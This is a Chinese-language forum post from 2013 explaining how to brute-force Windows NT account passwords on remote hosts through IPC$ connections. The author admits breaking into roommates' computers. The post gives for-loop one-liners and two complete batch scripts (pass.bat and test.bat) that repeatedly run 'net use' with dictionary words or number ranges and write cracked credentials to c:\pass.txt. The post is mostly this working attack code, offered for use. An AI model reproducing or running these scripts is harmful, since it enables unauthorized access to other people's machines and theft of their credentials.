返回列表 回復 發帖

用dos命令破解遠端NT用戶密碼

作者: pele 日期: 2013-10-14 01:04 閱讀: 2102 人 打印 收藏 大 中 小
假如知道一個NT帳戶與密碼,就可以用 net use \\主機\ipc$ "密碼" /user:"用戶" 與遠端主機建立連接,這是每一個駭客或是夢想成為又或是正在努力成為駭客的朋友都知道的方法,甚至連我這個連菜鳥都算不上的小鳥都知道,我也僅僅知道這一條,我就用我僅僅知道的這一條在宿舍網�媔i入別人的電腦,因為他們的電腦密碼都為空,被他們發現了之後狠K了一頓,然後紛紛加上了密碼,這下可沒戲了,想去偷窺他們的密碼他們又防範得緊,只得想其他辦法,也許各位大蝦們就會利用其他方法,諸如尋找系統之類得到管理許可權,而我不行,因為我前面說過,我只會那一條,那又會有人說用 軟體 暴力破解密碼就可以了,也許不錯,但首先我沒有那些高深的 軟體 也沒有天賦去研究那些複雜的用法,卻在無意間看DOS幫助時發現了一些命令,當真是天無絕人之路:
1、字典:for /f %i in (字典檔) do net use \\主機\ipc$ "%i" /user:"用戶"
2、數字:for /l %i in (start,step,end) do net use \\主機\ipc$ "%i" /user:"用戶"
以上可參看DOS�堶庶or幫助,還別說,真讓我給連上幾台機子,可問題也隨之而來,連是連上了,我仍然不知道密碼,下次要用還得重新全部試過。

正失望,無意間又發現了一個好方法,也許是我太笨,也許你們更聰明,,說不定你們早已經發現了,不再說廢話,下面就將方法全部給出,請各位大蝦指正:
將下麵文件存為pass.bat:
@echo off
echo ------------------------------------------------------------------- >>c:\pass.txt
echo ------------------------------------------------------------------- >>c:\pass.txt
date /t >>c:\pass.txt
time /t >>c:\pass.txt
echo 破解結果: >>c:\pass.txt
if "%6"=="1" goto shit2
:shit1
start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:shit2
start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit
將下麵文件存為test.bat:
net use \\%1\ipc$ %2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL%表示取前一命令執行返回結果,net use成功返回0,失敗返回2
:answer0
echo 遠端主機:"%1" >>c:\pass.txt
echo 用 戶:"%3" >>c:\pass.txt
echo 密 碼:%2 >>c:\pass.txt
net use \\%1\ipc$ /delet
exit
:answer2
將pass.bat與test.bat存放於system32中,用法如下:
1、如果用字典破解:pass.bat 字典檔路徑及名稱 主機 用戶名
2、如果用數字破解:pass.bat 起始數 步長 結束數 主機 用戶名 1
密碼破解出來之後,存放於c:\pass.txt文件�堶情C
另外,我做的這些只是在局域網內測試,如果遠端測試,受網速限制,具體情況只能靠自己去摸索。
返回列表